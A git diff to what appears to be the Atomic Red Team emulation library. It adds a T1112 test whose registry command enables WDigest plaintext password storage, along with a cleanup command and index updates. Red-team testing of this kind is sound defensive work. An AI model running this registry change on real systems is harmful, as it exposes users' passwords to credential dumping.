diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index dac4677b..3a4d075f 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -16,6 +16,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
 
+- [Atomic Test #4 - Modify registry for password downgrade to plain text](#atomic-test-4---modify-registry-for-password-downgrade-to-plain-text)
+
 
 <br/>
 
@@ -116,4 +118,24 @@ reg unload "HKU\$($ProfileList[$p].SID)"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - Modify registry for password downgrade to plain text
+Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping) 
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
+```
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+```
+
+
+#### Cleanup Commands:
+```
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
+```
+
 <br/>
diff --git a/atomics/index.md b/atomics/index.md
index 567f2776..01aadace 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -282,6 +282,7 @@
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
   - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
   - Atomic Test #3: Modify Registry of Another User Profile [windows]
+  - Atomic Test #4: Modify registry for password downgrade to plain text [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 8e6d4189..4be6525f 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -8156,6 +8156,23 @@ defense-evasion:
           ### Garbage collection and closing of ntuser.dat ###
           [gc]::Collect()
           reg unload "HKU\$($ProfileList[$p].SID)"
+    - name: Modify registry for password downgrade to plain text
+      description: "Sets registry key that will tell windows to store plaintext passwords
+        (making the system vulnerable to clear text / cleartext password dumping)
+        \n"
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
+          /v UseLogonCredential /t REG_DWORD /d 1 /f
+
+'
+        cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
+          /v UseLogonCredential /t REG_DWORD /d 0 /f
+
+'
   T1170:
     technique:
       external_references:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index 1db34349..6a31951f 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -89,6 +89,7 @@
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
   - Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
   - Atomic Test #3: Modify Registry of Another User Profile [windows]
+  - Atomic Test #4: Modify registry for password downgrade to plain text [windows]
 - [T1170 Mshta](./T1170/T1170.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
 - [T1096 NTFS File Attributes](./T1096/T1096.md)